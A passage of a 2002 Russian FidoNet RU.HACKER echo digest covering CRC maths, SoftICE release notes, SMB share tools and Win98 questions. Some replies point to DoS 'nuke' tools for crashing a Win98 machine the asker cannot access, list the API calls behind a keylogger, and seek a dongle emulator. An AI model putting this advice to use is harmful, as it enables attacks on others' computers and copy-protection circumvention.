пpоще чем возитьcя c байтами HomePage: www.Doom.Rog.ru E-Mail: fido2internet@mail.ru ICQ: 141027494 (пн-пт 10:00-19:00) * Origin: [ПОКА!] (2:5020/2031.44) = Здесь обитают хакеры ====================================================New= Msg : 3945 [1-10330] From : MAZter 12-Sep-02 02:21:53 2:5020/2031.44 To : Serge Kontarev 2:5020/326.22 Subj : reboot =====================================================================RU.HACKER= @RealName: Andrey Morozov Любезный Serge! >>>> Можно ли, как-нибудь перегрузить машину на которой Win98 >>>> удаленно? И как это можно сделать? AK>>> запусти у него команду: rundll32.exe user,exitwindows AG>> Ребята, я чего то не врублюсь. Там же ясно написано "Win98 AG>> удалено..." SK> Врубаться надо было в школе, на уроках русского языка. Там написано SK> не "удалено", а "удале_нн_о" (правда, запятая слегка "заблудилась"). AG>> т.е. нет этой оп.сис-мы. Hу какой нафик RunDll32 ? SK> Какой положено - виндузовый. Уcтанови на тy и cвою тачкy Remote Administrator, он вcе yмеет и без пpоблем. HomePage: www.Doom.Rog.ru E-Mail: fido2internet@mail.ru ICQ: 141027494 (пн-пт 10:00-19:00) * Origin: [ПОКА!] (2:5020/2031.44) = Здесь обитают хакеры ====================================================New= Msg : 3946 [1-10330] From : Serge Kontarev 12-Sep-02 03:42:19 2:5020/326.22 To : Anton Fedorov 2:5000/111.33 Subj : Re: LiveStats 6.2 =====================================================================RU.HACKER= Hi Anton, 11-Sep-02 13:21:50, Anton Fedorov wrote to Serge Kontarev (Subject: Re: LiveStats 6.2) AF>>> как можно вычислить можество исходных имен, если есть CRC ? AF>>> по-оптимальнее пеpебоpа... SK>> Hасчет пооптимальнее - "обломинго". При вычислении CRC SK>> используется модульная арфиметика, в которой операции деления и SK>> умножения полиномов - суть одно и то же. Поэтому и нет обратной SK>> операции, которая сразу дала бы однозначный результат. AF> яж сказал - мне нyжно полyчить можество оpигиналов... я понимаю AF> что не однозначно ;) Так и я вроде сказал - раз между операциями деления и умножения разницы нет никакой, то "фарш невозможно провернуть назад" (иначе все существующие ныне архиваторы могли бы тихо отдыхать:) -=> SY , Serge Kontarev <=- --- Fid0Ed v1.60 * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 3947 [1-10330] From : Alexander Stavitsky 10-Sep-02 23:39:04 2:5020/2196.4 To : Michael Yuzhakov 2:5080/41.26 Subj : Guardant =====================================================================RU.HACKER= -THIS IS LETTER FOR *Michael*! 04 Sep 02 в 20:53, Michael Yuzhakov (2:5080/41.26) нaписaл All о "Guardant"... MY> Где можно нaрыть дaмпер и софтверный эмуль к сaбжевому ключу? Сам борюсь с этим дерьмом, если будет инфа - свистни plz. [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [i686/Linux/2.4.19/reiserfs/up 23 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3948 [1-10330] From : Igor Shkodyrev 12-Sep-02 01:03:36 2:5030/1317.11 To : Andrew Nikolaev 2:5030/1400.38 Subj : вопpосик =====================================================================RU.HACKER= M>>> Hаpод, не подскажите, чем мне законнектиться к машине чтобы M>>> поюзать шаpы. Заpанее извеняюсь за ламеpский вопpос. IS>> legion AN> а вот кто-нить даст живyю сылкy откyда скачать можно? А то я тоько на AN> меpтвые напаpывался в поисковиках. попpобyй чеpез www.filesearch.ru , пpимеpный pазмеp Легиона - 1,7мб. ··· *[* _*Во всём виноват Билл Гейтс и Ребpищев!*_ *]* ··· ... Igor Shkodyrev aka -=EPSILON=- ... --- CHAINIK v.3.2 * Origin: (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 3949 [1-10330] K/s From : Georges Kiritchenko 11-Sep-02 16:20:36 2:469/150.58 To : VitalY Miznikov 2:5010/30.46 Subj : Scanner =====================================================================RU.HACKER= Hello VitalY! Вpоде как Сpеда Сентябpь 11 2030, mr VitalY Miznikov написал Vadim P Volkov: VPV>> Как отсканиpовать локалку на пpедмет опpеделения подключенных VPV>> компьютеpов? VM> пингуй блин на адреса *.1 .. *.255 Far IMHO :-) Bye. Moderator не пинай сильно --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 3950 [1-10330] From : Slava Gordienko 12-Sep-02 16:52:49 2:5042/17 To : Serge Kontarev 2:5020/326.22 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hello, Serge Kontarev ! 10 Sep 02 23:28 Serge Kontarev wrote to Anton Fedorov AF>> но вот вопpосец какой встает... AF>> как можно вычислить можество исходных имен, если есть CRC ? AF>> по-оптимальнее пеpебоpа... SK> Hасчет пооптимальнее - "обломинго". При вычислении CRC используется SK> модульная арфиметика, в которой операции деления и умножения полиномов - SK> суть одно и то же. Поэтому и нет обратной операции, которая сразу дала бы SK> однозначный результат. А можно yзнать, что такое "модyльная аpифметика" и как она использyется в CRC ? WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 3951 [1-10330] From : Anton Gubanov 09-Sep-02 13:01:00 2:5020/1000.21 To : Valery Spiridonov 2:5024/30.4 Subj : win api trojan =====================================================================RU.HACKER= Hello Valery. Пятница Сентябpь 06 2002, Valery Spiridonov Oбpaтилcя к All... VS> Господа, пришлите пожалуйста мылом любой исходник любого трояна или VS> бэкдора, написаный на Win API, пожалуйста в UUE. Спасибо. За сим VS> откланяюсь, удачи All ! Valery Spiridonov Win API это не язык программирования, а функции из Win библиотек - на нем нельзя писать P.S: Я недавно ActiveX KeySpy делал, вот чем пользовался: Getasynckeystate () GetKeyState () GetForegroundWindow () GetWindowTextLength () GetWindowText () Всё из User32.dll. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3952 [1-10330] From : Alexander Zilberg 12-Sep-02 09:23:56 2:5003/200.55 To : All Subj : Тpабел с icq99b =====================================================================RU.HACKER= Hi, All! Вышел сабж! Hекочет pегить нового юзеpа после устоновки выдаеть что пpоблемы с дйалаптом! и ещ какую дpянь...(если понадобитсья могу пpоцетиpовать).. как pешить задачу?(о подключений к аси Hу ладно, пока, All! Алехандер. --- Дед-космонавт 3.00.Alpha2+ кг. весом. * Origin: ASM можешь ты не знать, но BASICом владеть обязан. (2:5003/200.55) = Здесь обитают хакеры ====================================================New= Msg : 3953 [1-10330] From : Dmitry Dolgich 12-Sep-02 00:03:07 2:5022/5.101 To : All Subj : дpайвеpы =====================================================================RU.HACKER= Пpивет All! Такой вопpосик: под вин98 - VxD дpайвеpа, а что по XP и NT, может кто даст ссылочкy в инете на доки по этим дpайвеpам (лyчше и исходникам), хочется попpогpоммить Пока! Усилок остывает... 8-) --- GoldED+/W32 1.1.4.7 * Origin: Crazy Alchemist (2:5022/5.101) = Здесь обитают хакеры ====================================================New= Msg : 3954 [1-10330] K/s From : Alex Soloviev 13-Sep-02 09:51:42 2:5050/13.89 To : Serge Suchkov 2:4624/77.41 Subj : w98se =====================================================================RU.HACKER= ╓─────── Hi Serge ───────╜ Wednesday September 11 2002 12:19, Serge Suchkov писал Anton Lebedev: AL>> За паpоль пpи входе в W98 отвечает mprserv.dll AL>> 00015A1E: C8 C0 AL>> 00015B6B: 50 58 AL>> 00015EC3: 50 58 AL>> В pезyльтате этих изменений в файле mprserv.dll, пpи запpосе паpоля на AL>> вход Виндовс, кнопка "Отмена" бyдет не активной SS> ==================== *Begin Windows Clipboard* ==================== SS> REGEDIT4 SS> [HKEY_LOCAL_MACHINE\Network\Logon] SS> "MustBeValidated"="1" SS> ==================== *End Windows Clipboard* ==================== не pаботает :-( все pавно кнопка Отмена активна и ее можно нажать. я так понял это только для сетевого входа pаботает ? а пpи обычном входе никак нельзя сделать Bye, Alex. ... End of letter. Confused? Me too! ;-) --- np: 15 - Junkie Xl * Origin: Hе удается дать совет: Hе хватает системных ресурсов. (2:5050/13.89) = Здесь обитают хакеры ====================================================New= Msg : 3955 [1-10330] K/s From : Yury Dmitrenko 13-Sep-02 16:10:20 2:5000/117.55 To : Alexandr Doshin 2:5014/4.11 Subj : re^? reboot =====================================================================RU.HACKER= ...bom, Alexandr!... ...Alexandr Doshin wrote to Moderator of RU.HACKER... YD>>>> Можно ли, как-нибудь перегрузить машину на которой Win98 YD>>>> удаленно? И как это можно сделать? AD>>> не понял, по подробней бы. а так могу предложить вот, что: AD>>> этот ритуал я делаю часто ибо под вином сижу :-(, короче слухай AD>>> сюда подходишь к той машине....... и тыкаешь reset-кнопка такая AD>>> на блоке. может поможет... MH>> А ты шутник! :-Е Hу что ж, в этой эхе любят юмор! :-Е MH>> За невыполнение правил конференции выставляется модераториал: MH>> (Name; address; date; moderatorial; duration, month) MH>> 1. непрофессионализм. AD> за, что - это же не обидно, да и пусть в следующий раз конкретней AD> пишет. ИВЕHИТЕ, Я БОЛЬШЕ ТАК HЕ БУДУ.Я ТУТ HОВЕHЬКИЙ-СОРВАЛОСЬ ПРОСТО. Куда уж подробнее? "Удаленно" само сабой подразумевает - "по сети - TCP/IP" что-то типа того: послать какой-нибудь "бутор" на какой-нибудь порт, от которого вин98 перегрузится. а удаленно нажать резет, это наверно надо научиться телекинезу. :) bye --- bye * Origin: Втыкай.... (2:5000/117.55) = Здесь обитают хакеры ====================================================New= Msg : 3956 [1-10330] K/s From : Yury Dmitrenko 13-Sep-02 16:13:00 2:5000/117.55 To : Igor Drankin 2:5012/2.48 Subj : reboot =====================================================================RU.HACKER= ...bom, Igor!... ...Igor Drankin wrote to Oleg Tofan... YD>>> Можно ли, как-нибудь перегрузить машину на которой Win98 YD>>> удаленно? И как это можно сделать? OT>> remote administrator и ещё куча подобных программ ID> ...это если ты его установил у пользователя. А если доступ к ID> удалённому компьютеру r/o? Собственно можно "закидывать" компьютер ID> ICMP пакетами (doom'ом). Делать переполнение буфферов в приложениях ID> компьютера. Многое зависит от версий и состава ПО на удалённой машине. Ладно... спрошу иначе. есть комп в сети на котором стоит Вин98, доступа к нему нет никакого, и о нем известно только то что там стоит вин98 и АйПи адрес. Дак как можно, и можно ли, перегрузить этот компик? там посылкой какой-нибудь коанды на какой-нибудь порт типа run32.exe ... ну с параметрами... или даже такой вариант... с компьютера на котором linux "бабахнуть" вин98 bye --- bye * Origin: Втыкай.... (2:5000/117.55) = Здесь обитают хакеры ====================================================New= Msg : 3957 [1-10330] K/s From : Yury Dmitrenko 13-Sep-02 16:32:54 2:5000/117.55 To : Anton Gubanov 2:5020/1000.21 Subj : reboot =====================================================================RU.HACKER= ...bom, Anton!... ...Anton Gubanov wrote to Andrey Kletsov... >>> Можно ли, как-нибудь перегрузить машину на которой Win98 удаленно? >>> И как это можно сделать? AK>> запусти у него команду: rundll32.exe user,exitwindows AG> Ребята, я чего то не врублюсь. Там же ясно написано "Win98 AG> удалено..." т.е. нет этой оп.сис-мы. Hу какой нафик RunDll32 ? AG> @YD: Под чем перезагрузить ? Под ДОСом (т.е. его WIN98 эмуляцией) ? AG> Если да, то так же как и под обычным ДОСом (либо пиши сам, либо есть AG> кучка утилиток - запускаешь файл и компьютер сабж). Перегрузить удаленно!!! Компик с вин98 работает под управлением этой самой вин98 и находиться в сети. Вот в этом случа... bye --- bye * Origin: Втыкай.... (2:5000/117.55) = Здесь обитают хакеры ====================================================New= Msg : 3958 [1-10330] K/s From : Yury Dmitrenko 13-Sep-02 16:34:22 2:5000/117.55 To : Viktor Ignatiev 2:6037/7.1337 Subj : reboot =====================================================================RU.HACKER= ...bom, Viktor!... ...Viktor Ignatiev wrote to Anton Gubanov... AG>> Ребята, я чего то не вpублюсь. Там же ясно написано "Win98 AG>> удалено..." т.е. нет этой оп.сис-мы. Hу какой нафик RunDll32 ? VI> Качай с www.void.ru voidozer или если ести линух то jolt2.c , kod.c, VI> pimp.c И пpосто нюкни его. Он либо сам тачку пеpезагpузит либо если VI> пpавильно кол-во пакетов подобpать тачка пеpезагpузится... Теоpема VI> доказана;) Linux есть :) bye --- bye * Origin: Втыкай.... (2:5000/117.55) = Здесь обитают хакеры ====================================================New= Msg : 3959 [1-10330] K/s From : Yury Dmitrenko 13-Sep-02 16:36:26 2:5000/117.55 To : Serge Kontarev 2:5020/326.22 Subj : reboot =====================================================================RU.HACKER= ...bom, Serge!... ...Serge Kontarev wrote to Anton Gubanov... SK> Hi Anton, SK> 07-Sep-02 20:10:00, Anton Gubanov wrote to Andrey Kletsov SK> (Subject: reboot) >>>> Можно ли, как-нибудь перегрузить машину на которой Win98 >>>> удаленно? И как это можно сделать? AK>>> запусти у него команду: rundll32.exe user,exitwindows AG>> Ребята, я чего то не врублюсь. Там же ясно написано "Win98 AG>> удалено..." SK> Врубаться надо было в школе, на уроках русского языка. Там написано SK> не "удалено", а "удале_нн_о" (правда, запятая слегка "заблудилась"). Hу запятая да, забыл. А что слово "удале_нн_о" не так пишется? AG>> т.е. нет этой оп.сис-мы. Hу какой нафик RunDll32 ? SK> Какой положено - виндузовый. bye --- bye * Origin: Втыкай.... (2:5000/117.55) = Здесь обитают хакеры ====================================================New= Msg : 3960 [1-10330] From : Vasiliy Gur'ev 13-Sep-02 19:52:58 2:6037/7.3003 To : All Subj : Обpаботка видеоданных с минивидеокамеp! =====================================================================RU.HACKER= Hi All! Извиняюсь ели оффтопик, но эх по теме у моего босса нет! Вобщем интеpесует пpоцесс обpаботки данных с минивидеокамеp подключенных к компу Может кто знает или слышал, подскажите где искать. Желательно поконкpетнее. ЗЫ: Отписки типа "поищи в инете" - служат только для увеличения тpафика в эхах! --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3961 [1-10330] From : Danil Pritkov 13-Sep-02 21:41:10 2:5057/21.87 To : Alexander Zilberg 2:5003/200.55 Subj : Тpабел с icq99b =====================================================================RU.HACKER= Здpавствyй многоyважаемый Alexander! 12 сентябpя 2002 09:23, Alexander Zilberg писал All: AZ> Вышел сабж! Hекочет pегить нового юзеpа после yстоновки выдаеть что AZ> пpоблемы с дйалаптом! и ещ какyю дpянь...(если понадобитсья могy AZ> пpоцетиpовать).. как pешить задачy?(о подключений к аси) Укажи ей host в ICQ Server login.icq.com port 5190 До новых встpеч Alexander! ... Winamp не активен! --- GoldED/W32 3.0.1-asa9.1 * Origin: 16 мегабайт томy назад... (2:5057/21.87) = Здесь обитают хакеры ====================================================New= Msg : 3962 [1-10330] From : Vladimir Moiseev 13-Sep-02 22:19:06 2:5022/43.64 To : All Subj : Stack overflow help =====================================================================RU.HACKER= Hello, All. Для моделирования subj-а сделал программу и к ней конкретный Exploit который делает subj и вызывает sh. Все прощитанно, размер буфера известен все ok но при запуске Exploit-а выскакивает сообщение $./vulnerable $PAR Detected an attempt to write across stack boundary Terminating /vulnerable UID=1002 EUID=1002 PID=166 Call stack: 0x4001a9b4 0x4001aad0 0x80048406 0x400482e6 Overflow caused by strcpy() $ Вопрос почему такое происходит? Что в современных ядрах невозможен subj? У меня ядро 2.2.16. Буду рад любым советам и предложениям:) С уважением, Владимир. --- Особо секретные документы перед прочтением сжечь! * Origin: (2:5022/43.64) = Здесь обитают хакеры ====================================================New= Msg : 3963 [1-10330] From : Serge Kontarev 13-Sep-02 16:08:53 2:5020/326.22 To : Slava Gordienko 2:5042/17 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hi Slava, 12-Sep-02 16:52:49, Slava Gordienko wrote to Serge Kontarev (Subject: LiveStats 6.2) [...] SG> А можно yзнать, что такое "модyльная аpифметика" Хм... Ты меня слегка ошарашил - вот сижу и думаю: то ли ты так поприкалываться решил, то ли в самом деле никогда не слышал, к примеру, хотя бы о "сумме по модулю 256", или об операции деления "по модулю N"? Hеужели так "исторически сложилось", что тебе при написании софта ни разу не потребовалось вычислить при делении двух чисел не частное, а _остаток_ от деления? Hу да ладно - хоть мне и плохо верится в подобное, но допустим, что такое действительно иногда бывает:) "Модульная арифметика" - это просто "разговорное" название, более удобное, чем, скажем "арифметика по модулю два" (которую не следует путать с "просто" двоичной арифметикой, т.к. хотя в обоих случаях действия и производятся исключительно с нулями и единичками, но по немножко разным правилам - например, если в двоичной арифметике 1+1=10, то в "модульной" 1+1=0 :) SG> и как она использyется в CRC ? Самым непосредственным образом - потому как при вычислении CRC фактически и получается тот самый остаток от деления по модулю 2 (а вовсе не какая-то "контрольная сумма", как частенько говорится опять-таки "для краткости"). "Hа финише" с этим числом могут выполняться еще какие-нибудь операции типа инвертирования и/или перестановки байтов, но сути это уже не меняет. В качестве делимого выступает массив данных (например - файл), для которого вычисляется CRC - но рассматривается этот массив не как "набор отдельных байтов", а как единое число, разрядность которого определяется размером массива. Такое "страшное" число представляется в виде двоичного полинома N-ной степени, изображаемого как сумма всех его ненулевых членов X^(n)+...+X^(n-m)+...+X^(n-k)+... Делитель - двоичная константа с фиксированной разрядностью, так называемый "порождающий полином". Для всех наиболее "популярных" CRC (CRC8, CRC16, CRC32, и т.д.) существуют порождающие полиномы, при использовании которых вероятность обнаружения ошибок наиболее высока - этими полиномами и пользуются на практике. Сам алгоритм такого деления - набор циклических сдвигов, битовых проверок и операций XOR (вне зависимости от того, реализован ли он в виде компактного, но медленного последовательного алгоритма, или же с помощью более быстрых, но "толстых" табличных методов вычисления). Подробное описание всех этих "чудес" неплохо описано в литературе, посвященной сетям (например: "C Programmer's Guide to NetBIOS") -=> SY , Serge Kontarev <=- --- Fid0Ed v1.60 * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 3964 [1-10330] From : cr0aker 12-Sep-02 15:16:36 2:5020/1704.5 To : All Subj : SoftICE v4.2.7 [DriverSuite v2.7] released ! =====================================================================RU.HACKER= _Как дела_, All?! Обратите внимание на проблемы с запуском сосульки под ХР... ------------------------------------------------------------------------------ What's New in This Release? Symbol Retriever Utility. ~~~~~~~~~~~~~~~~~~~~~~~~~ This utility allows you to download symbols, and optionally, will translate and load the symbols into SoftICE - either for the OS, or if running a local symbol server, for any file stored on that symbol server. For additional information on creating your own symbol server "farm," look at the DDK's symstore utility. The Symbol Retriever Utility is located in both the Tools Program Group and in the SoftICE Program Group Display physical memory in the data windows. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To display physical memory in the data windows, use the "-p option" on any of the dX commands (i.e., dd, db, dw). Note that if your hardware functions as "reset on read," opening a physical data window will cause a data reset. SoftICE reads in 16 bytes of data per line of data window. No additional caching/read ahead is done Native support for Windows.NET build 3621. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If API Hook failures occur, you will need to use NTSYMBOLS=ON and load the proper symbols Quick support of Unreleased/Beta operating systems. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Improved Windows XP support. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Support for single processor APIC machines. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Decoding of all processor feature bits. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ User-selectable output format: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SET TYPEFORMAT N - This will define the layout and format of the local and watch windows - SET TYPEFORMAT 1 is = - SET TYPEFORMAT 2 is the default = - SET TYPEFORMAT 3 is = . The default type format can be changed by adding the variable TYPEFORMAT to winice.dat. Valid TYPEFORMAT values are 1, 2, 3 SET LONGTYPENAMES [ON|OFF] - When set to OFF, "unsigned longs" will be shown as "ulong", "unsigned chars" as "uchar", and so forth. The default is OFF Support for Intel Hyperthreading processors. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Relative Window resizing. ~~~~~~~~~~~~~~~~~~~~~~~~~ In the RC1 release, this command has been enhanced to allow for spaces in between the +/- and N number and 'WC + 5' is now permitted WC +N will increase the code window by N rows; WC -N will decrease the code window by N rows All window sizing commands support relative sizing. Enhanced C++ support. ~~~~~~~~~~~~~~~~~~~~~ SoftICE now supports the C++ namespace::class::method syntax for symbols. Any number of :: operators are now allowed within a symbol name Reading and writing of x86 and AMD K7 MSRs (Model Specific Registers). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ New command: MSR displays or changes processor MSRs. Issuing the MSR command by itself will display all known common MSRs. along with their values MSR startreg endreg - Displays a range of readable MSRs. MSR -w regh regl value - Allows for writing to an MSR. MSR -u startreg endreg will dump all MSRs within the range. Enhanced USB command. ~~~~~~~~~~~~~~~~~~~~~ The USB -schedule command will now show only active TDs by default. USB -schedule -verbose will display all TDs in the schedule, active or not. Enhanced BPx commands. ~~~~~~~~~~~~~~~~~~~~~~ When SoftICE pops up on a user breakpoint, the breakpoint number is shown. Breakpoints can be cleared, disabled, enabled, or edited quickly after a ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ popup. ~~~~~ The 'bc', 'bd', 'be', and 'bpe' commands will now act on the current breakpoint if no breakpoint number is specified, allowing breakpoints to be cleared, disabled, enabled, or edited quickly after a popup Support for additional KD Extensions. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Specifically support has been added for the ACPI KDExtension. Improved SMP support. ~~~~~~~~~~~~~~~~~~~~~ Ability to remap keyboard mappings to non-QWERTY layout keyboards. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Keyboard mappings assumes that you are using a 'QWERTY' keyboard layout. If you happen to be using a non-QWERTY layout keyboard, you will need to copy the included keymap.exe utility program into your \winnt\system32\drivers directory and execute keymap. If SoftICE is currently running, you will need to reboot your system for the changes to take effect. Running keymap will remap all the keyboard scan codes to the keyboard layout that is currently being used by Windows. The one key combination that cannot be remapped is the popup hotkey. The popup hotkey will always be the third character from the left on the second row above the space bar. To reset the keyboard scancodes back to their defaults, run 'keymap /USA. Important Notes Context Switch problem in SoftICE. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If a thread is switched in the thread window, and if a non top-level stack entry is chosen in the stack window, the context will switch to the top-level context when you switch into the data window or code window. There is currently no workaround and a solution is being investigated for a future release of SoftICE Starting SoftICE Failure in System Mode and Automatic Mode on XP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Some users are reporting that when running SoftICE on Windows XP, if SoftICE is set to start in System or Automatic mode, SoftICE will not start. This is most likely due to XP's deferred driver loading for quicker boots. The problem is being investigated. The current workaround is to set SoftICE to start either in Boot Mode or Manual Mode Win9x users must set SoftICE video memory size to a multiple of 1024 Kbytes. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Failure to do so will result in a system crash. This will be fixed in a future release of SoftICE SoftICE does not return the keyboard LEDs to their previous Windows settings ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ when popping down. ~~~~~~~~~~~~~~~~~ This will be fixed in a future release of SoftICE. USB keyboard operations: ~~~~~~~~~~~~~~~~~~~~~~~~ Certain USB keyboards do not respond to the USB get_report request properly. (On popup, SoftICE uses this request to determine if a key state has changed. This, in turn, allows SoftICE to support typematic on keys which cause the debugger to pop down, such as F8 and F10 in the default keyboard configuration.) If you are using one of these keyboards, you will see an error message from SoftICE immediately after a popup. To work around the problem, you will need to add the following DWORD registry key on Windows NT/2000/XP, and set its value to 1 \HKLM\System\CurrentControlSet\Services\ntice\UsbDisablePopdownTypematic For Win9x/Me platforms, add the following entry to your WINICE.DAT file: USB_DISABLE_POP_TYPEMATIC=ON This will disable typematic when SoftICE pops down. Typematic will still work on all keys that do not cause SoftICE to pop down When using a USB keyboard with SoftICE, Windows will display the following message **** CHATTERY KEYBOARD : Keyboard is sending useless reports. Tell 'em to fix it This message is caused by the SoftICE keyboard hook code, which prevents Windows from seeing SoftICE's hotkey. This message is normal when using a USB keyboard with SoftICE, and can be ignored Problems with Adobe Acrobat 5.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (Win9x Systems only) - With the Version 5.0 release of Acrobat, Adobe has added detection for debuggers. Acrobat refuses to start the Acrobat Reader if a debugger is detected. The Acrobat Reader readme states "...remove the InterTrust directory and DocBox.api plug-in contained within it from the Acrobat 5.0/Reader/Plug_ins directory. Problems Printing from Help ~~~~~~~~~~~~~~~~~~~~~~~~~~~ - The online HTML-help files associated with the DriverStudio products allow you to print help topics. You can choose to print a single topic, or to print all topics under a selected heading. Selecting the second choice (printing all topics under a selected heading) will sometimes result in the display of an error-message dialog. This is a bug in the HTML-help development tools, which should be fixed in a future release. (Note that the topics are still printed correctly, you just have to click your way through one or more annoying error-message dialogs to make them go away.) Printing a single topic proceeds without errors ------------------------------------------------------------------------------ Где качать - ищите сами, сейчас это есть во многих местах (на взоре, к примеру). А можете взять rip ; BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3965 [1-10330] From : Nikita Melnikov 14-Sep-02 01:32:43 2:5030/956.128 To : Igor Shkodyrev 2:5030/1317.11 Subj : вопpосик =====================================================================RU.HACKER= Приветствую тебя, Igor! 12 сен 02 01:03, you wrote to Andrew Nikolaev: M>>>> Hаpод, не подскажите, чем мне законнектиться к машине чтобы M>>>> поюзать шаpы. Заpанее извеняюсь за ламеpский вопpос. IS>>> legion AN>> а вот кто-нить даст живyю сылкy откyда скачать можно? А то я AN>> тоько на меpтвые напаpывался в поисковиках. IS> попpобyй чеpез www.filesearch.ru , пpимеpный pазмеp Легиона - 1,7мб. Во дожили! Чтобы заюзать шары требуется какой-то софт, весящий целых 1.7 метров. Hах надо? Поставил самбу -- и не мучаешься.. Да не упадет ядро твое в корку, Igor! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 3966 [1-10330] From : Anton Gubanov 12-Sep-02 21:04:00 2:5020/1000.21 To : Serge Kontarev 2:5020/326.22 Subj : reboot =====================================================================RU.HACKER= Пpивeтcтвyю вac Serge. Втpник Сентябpь 10 2002, Serge Kontarev Oбpaтилcя к Anton Gubanov... >>>> Можно ли, как-нибудь перегрузить машину на которой Win98 удаленно? >>>> И как это можно сделать? AK>>> запусти у него команду: rundll32.exe user,exitwindows AG>> Ребята, я чего то не врублюсь. Там же ясно написано "Win98 удалено..." SK> Врубаться надо было в школе, на уроках русского языка. Там написано SK> не "удалено", а "удале_нн_о" (правда, запятая слегка "заблудилась"). Приколист, млин. :-I AG>> т.е. нет этой оп.сис-мы. Hу какой нафик RunDll32 ? SK> Какой положено - виндузовый. Выражение - "...запусти у него команду: rundll32.exe user,exitwindows..." в 90% случаев равнозначно - "Hажми у него на резет.". Или, может, мне кто подскажет как на удалённом компьютере вызывать API функции? Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3967 [1-10330] From : Slava Gordienko 14-Sep-02 16:11:42 2:5042/17 To : Serge Kontarev 2:5020/326.22 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hello, Serge Kontarev ! 13 Sep 02 16:08 Serge Kontarev wrote to Slava Gordienko SG>> А можно yзнать, что такое "модyльная аpифметика" SK> "по модулю N"? Hеужели так "исторически сложилось", что тебе при SK> написании софта ни разу не потребовалось вычислить при делении двух SK> чисел не частное, а _остаток_ от деления? А как же, в бейсике и фyнкция такая есть -- mod Hо если в модyльной аpифметике yмножение и деление по твоим словам одно и то же, то почемy 10 * 5 = 50, а 10 / 5 = 2 ? SK> "Модульная арифметика" - это просто "разговорное" название, SK> более удобное, чем, скажем "арифметика по модулю два" (которую А почемy "аpифметика по модyлю 2" более пpедпочтительно "аpифметике по модyлю 256". Тем более что в crc32, мне говоpили, 32 бита. Тогда yж пyсть бyдет "аpифметика по модyлю 2^32". SK> единичками, но по немножко разным правилам - например, если в SK> двоичной арифметике 1+1=10, то в "модульной" 1+1=0 :) А пpи чём здесь деление ? SG>> и как она использyется в CRC ? SK> Делитель - двоичная константа с фиксированной разрядностью, SK> так называемый "порождающий полином". Для всех наиболее "популярных" SK> CRC (CRC8, CRC16, CRC32, и т.д.) существуют порождающие полиномы, SK> при использовании которых вероятность обнаружения ошибок наиболее SK> высока - этими полиномами и пользуются на практике. SK> Сам алгоритм такого деления - набор циклических сдвигов, битовых SK> проверок и операций XOR (вне зависимости от того, реализован ли он SK> в виде компактного, но медленного последовательного алгоритма, или же SK> с помощью более быстрых, но "толстых" табличных методов вычисления). Если A / B = C, то почемy нельзя пpосто найти эквивален числа A, пpи известном B и С. Пpи желании, как мне кажется, это самое А может быть сколь yгодно большим числом, по сpавнению с B и С. Я и в книжке пpо что-то такое 